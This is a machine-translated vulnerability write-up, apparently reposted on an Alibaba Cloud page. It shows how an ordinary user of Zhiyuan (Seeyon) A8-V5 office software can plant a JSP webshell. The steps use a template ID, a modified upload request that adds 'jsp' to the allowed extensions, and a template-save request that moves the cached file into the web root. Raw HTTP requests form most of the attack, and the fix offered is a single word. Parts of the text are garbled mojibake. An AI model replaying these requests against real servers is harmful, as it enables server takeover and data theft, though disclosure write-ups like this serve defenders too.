Zhiyuan A8-V5 collaborative management software normal user Arbitrary File Upload (kill V5)

Source: Internet
Author: User

Zhiyuan A8-V5 collaborative management software normal user Arbitrary File Upload (kill V5)

These days have been pondering far A8-V5, yesterday found a few small problems, today further mining Arbitrary File Upload Vulnerability.

Zhiyuan A8-V5 collaborative management software allows ordinary users to call the function of the system-Permission [Login Page Template management], although the browser can not directly access this function, prompt that the permission is insufficient, however, data packets can be sent directly.



Zhiyuan A8-V5 collaborative management software fully considers the danger of file upload, the whole system uses the Upload File Cache to the web directory, cannot directly obtain webshell. However, the webshell can be obtained by migrating the File Cache in [Login Page Template management] to the web directory.


Steps:

1. Obtain the template ID using valid sessions

2. Break through the restrictions to upload jsp executable files

3. Use Dynamic Migration Technology to migrate files cached outside the web directory to any web directory



1. Obtain the template ID using valid sessions

Request:
 

POST /seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager HTTP/1.0Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://a8v51.seeyon.com/seeyon/portal/loginTemplateController.do?method=loginTemplateMain&entityType=1&_resourceCode=T03_loginTemplateListAccept-Language: zh-cnProxy-Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: a8v51.seeyon.comContent-Length: 74DNT: 1Pragma: no-cacheCookie: JSESSIONID=4DD87116B4082E92D03F5BB3F7F0C56F; loginPageURL="/main.do"; avatarImageUrl=8469117046183055270; Hm_lvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849; Hm_lpvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849managerMethod=selectTemplateById&arguments=["2676694155142778633"]



Response:
 

{"Name": "Logon page-Single Image", "path": "default \/login. jsp "," description ":" Single Image, simple style "," updateTime ":" "," sort ":" 1 "," preset ": 1, "updateUser": "8469117046183055270", "cdefault": 0, "thumbnail": "default \/thumbnail.png", "id": "2676694155142778633", "new": false, "extraMap ":{}}



The value of the parameter id in response needs to be recorded as 2676694155142778633





2. Break through the restrictions to upload jsp executable files

You need to modify the extensions in the original post request and add jsp after "jpg, jpeg, gif, bmp, png". Change the filename file name from. jsg to. jsp.

After modification, the request is as follows:
 

POST /seeyon/fileUpload.do?method=processUpload HTTP/1.0Accept: text/html, application/xhtml+xml, */*Referer: http://a8v51.seeyon.com/seeyon/fileUpload.do?type=&firstSave=true&applicationCategory=1&extensions=jpg,jpeg,gif,bmp,png&quantity=1&isEncrypt=false&attachmentTrId=poi3&callMethod=uploadCallBack2&maxSize=2097152&takeOver=true&_isModalDialog=trueAccept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoContent-Type: multipart/form-data; boundary=---------------------------7ded626340460Proxy-Connection: Keep-AlivePragma: no-cacheContent-Length: 76766DNT: 1Host: a8v51.seeyon.comCookie: JSESSIONID=3385E1567ED6D100FD461F2299761286; loginPageURL="/main.do"; avatarImageUrl=-7273032013234748168; pgv_pvi=3462602752-----------------------------7ded626340460Content-Disposition: form-data; name="type"-----------------------------7ded626340460Content-Disposition: form-data; name="extensions"jpg,jpeg,gif,bmp,png,jsp-----------------------------7ded626340460Content-Disposition: form-data; name="applicationCategory"1-----------------------------7ded626340460Content-Disposition: form-data; name="destDirectory"-----------------------------7ded626340460Content-Disposition: form-data; name="destFilename"-----------------------------7ded626340460Content-Disposition: form-data; name="maxSize"2097152-----------------------------7ded626340460Content-Disposition: form-data; name="isEncrypt"false-----------------------------7ded626340460Content-Disposition: form-data; name="callMethod"uploadCallBack2-----------------------------7ded626340460Content-Disposition: form-data; name="attachmentTrId"poi3-----------------------------7ded626340460Content-Disposition: form-data; name="firstSave"true-----------------------------7ded626340460Content-Disposition: form-data; name="takeOver"true-----------------------------7ded626340460Content-Disposition: form-data; name="file1"; filename="wooyun.jsp"Content-Type: text/plain<%--jsp File browser 1.2--%>-----------------------------7ded626340460--





Find ". jsp" in response"


 



Record

fileurls=fileurls+","+'-4028755744185366901';

Value "-4028755744185366901" in





3. Use Dynamic Migration Technology to migrate files cached outside the web directory to any web directory



First, let's see how the source code is written.


 

If ("1". equals (hotSpotType) {String picFileId = (String) params. get ("picFileId" + I); if (picFileId! = Null) & (picFileId. trim (). length ()> 0) {File uploadedFile = this. fileManager. getFile (Long. valueOf (Long. parseLong (picFileId), new Date (); try {String targetUrl = hotspotvalue. substring (0, hotspotvalue. lastIndexOf ("/") + 1) + picFileId + hotspotvalue. substring (hotspotvalue. lastIndexOf (". "), hotspotvalue. length (); FileCopyUtils. copy (uploadedFile, new File (Template_Parent_Path + targetUrl); this. fileSynchronization. copy (new FileInputStream (uploadedFile), "main/login/" + targetUrl); hotspot. setHotspotvalue (targetUrl);} catch (IOException e) {throw new BusinessException ("image file storage error:" + e );}}}





Two parameters are required for success: picFileId and targetUrl.



Okay. In this demonstration

The picFileId value is-4028755744185366901 in step 2.

TargetUrl =

String targetUrl = hotspotvalue.substring(0, hotspotvalue.lastIndexOf("/") + 1) + picFileId + hotspotvalue.substring(hotspotvalue.lastIndexOf("."), hotspotvalue.length());



PicFileId is known

Hotspotvalue can be customized



The custom location is the last line. If the id obtained in step 1 is different, replace the following id with the id in step 1.





The request is as follows:
 

POST /seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager&rnd=75321 HTTP/1.0Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://a8v51.seeyon.com/seeyon/portal/loginTemplateController.do?method=loginTemplateMain&entityType=1&_resourceCode=T03_loginTemplateListAccept-Language: zh-cnProxy-Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: a8v51.seeyon.comContent-Length: 5255DNT: 1Pragma: no-cacheCookie: JSESSIONID=31BEBA9DAA457E8E8280E97175FD4DBB; loginPageURL="/main.do"; avatarImageUrl=-7273032013234748168; pgv_pvi=3462602752managerMethod=transSaveTemplate&arguments=[{"id":"2676694155142778633","entityLevel":"system","entityId":"-1730833917365171641","name":"??????é?μ-????????????","description":"?????????????????????é£?? ?","sort":"1","path":"default/login.jsp","hotSpotsCount":"8","hotSpotId0":"1186536015593226561","hotSpotType0":"0","templateId0":"2676694155142778633","hotspotkey0":"note","description0":"","entityId0":"-1730833917365171641","entityLevel0":"System","hotspotName0":"hotspot.name.note","hotspotModule0":"0","hotspotSort0":"0","hotspotRead0":"0","showdisplay0":"0","hotAccountId0":"-1730833917365171641","hotspotvalue0":"è?′è??A8-V5????????????è?ˉ???","hotSpotId1":"-2858574230077355948","hotSpotType1":"0","templateId1":"2676694155142778633","hotspotkey1":"note","description1":"","entityId1":"-1730833917365171641","entityLevel1":"System","hotspotName1":"hotspot.name.note","hotspotModule1":"0","hotspotSort1":"0","hotspotRead1":"0","showdisplay1":"0","hotAccountId1":"-1730833917365171641","hotspotvalue1":"è?′è??A8-V5????????????è?ˉ???","hotSpotId2":"-6590619288520733107","hotSpotType2":"1","templateId2":"2676694155142778633","hotspotkey2":"contentbgi","description2":"","entityId2":"-1730833917365171641","entityLevel2":"System,Account","hotspotName2":"hotspot.name.loginpic","hotspotModule2":"0","hotspotSort2":"1","hotspotRead2":"0","showdisplay2":"0","hotAccountId2":"-1730833917365171641","picFileId2":"","hotspotvalue2":"default/images/main_content_ie6.jpg","hotSpotId3":"-151221304857771845","hotSpotType3":"1","templateId3":"2676694155142778633","hotspotkey3":"contentbgi","description3":"","entityId3":"-1730833917365171641","entityLevel3":"System,Account","hotspotName3":"hotspot.name.loginpic","hotspotModule3":"0","hotspotSort3":"1","hotspotRead3":"0","showdisplay3":"0","hotAccountId3":"-1730833917365171641","picFileId3":"","hotspotvalue3":"default/images/main_content_ie6.jpg","hotSpotId4":"-8315917587715897900","hotSpotType4":"2","templateId4":"2676694155142778633","hotspotkey4":"mainbgc","description4":"","entityId4":"-1730833917365171641","entityLevel4":"System,Account","hotspotName4":"hotspot.name.mainbgc","hotspotModule4":"0","hotspotSort4":"2","hotspotRead4":"0","showdisplay4":"0","hotAccountId4":"-1730833917365171641","hotspotvalue4":"#fafafa","hotSpotId5":"7763739069174663407","hotSpotType5":"2","templateId5":"2676694155142778633","hotspotkey5":"mainbgc","description5":"","entityId5":"-1730833917365171641","entityLevel5":"System,Account","hotspotName5":"hotspot.name.mainbgc","hotspotModule5":"0","hotspotSort5":"2","hotspotRead5":"0","showdisplay5":"0","hotAccountId5":"-1730833917365171641","hotspotvalue5":"#fafafa","hotSpotId6":"5768369956880141892","hotSpotType6":"1","templateId6":"2676694155142778633","hotspotkey6":"mainbgi","description6":"","entityId6":"-1730833917365171641","entityLevel6":"System","hotspotName6":"hotspot.name.mainbgi","hotspotModule6":"0","hotspotSort6":"3","hotspotRead6":"0","showdisplay6":"0","hotAccountId6":"-1730833917365171641","picFileId6":"","hotspotvalue6":"default/images/main_bg.png","hotspotTiling6":"1","hotSpotId7":"-3488186128041623434","hotSpotType7":"1","templateId7":"2676694155142778633","hotspotkey7":"mainbgi","description7":"","entityId7":"-1730833917365171641","entityLevel7":"System","hotspotName7":"hotspot.name.mainbgi","hotspotModule7":"0","hotspotSort7":"3","hotspotRead7":"0","showdisplay7":"0","hotAccountId7":"-1730833917365171641","picFileId7":"-4028755744185366901","hotspotvalue7":"default/-4028755744185366901.jsp","hotspotTiling7":"1"}]



Response: The response is null. Here, the cached files stored in non-web directories are migrated to the web directory.


Solution:

Filter

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.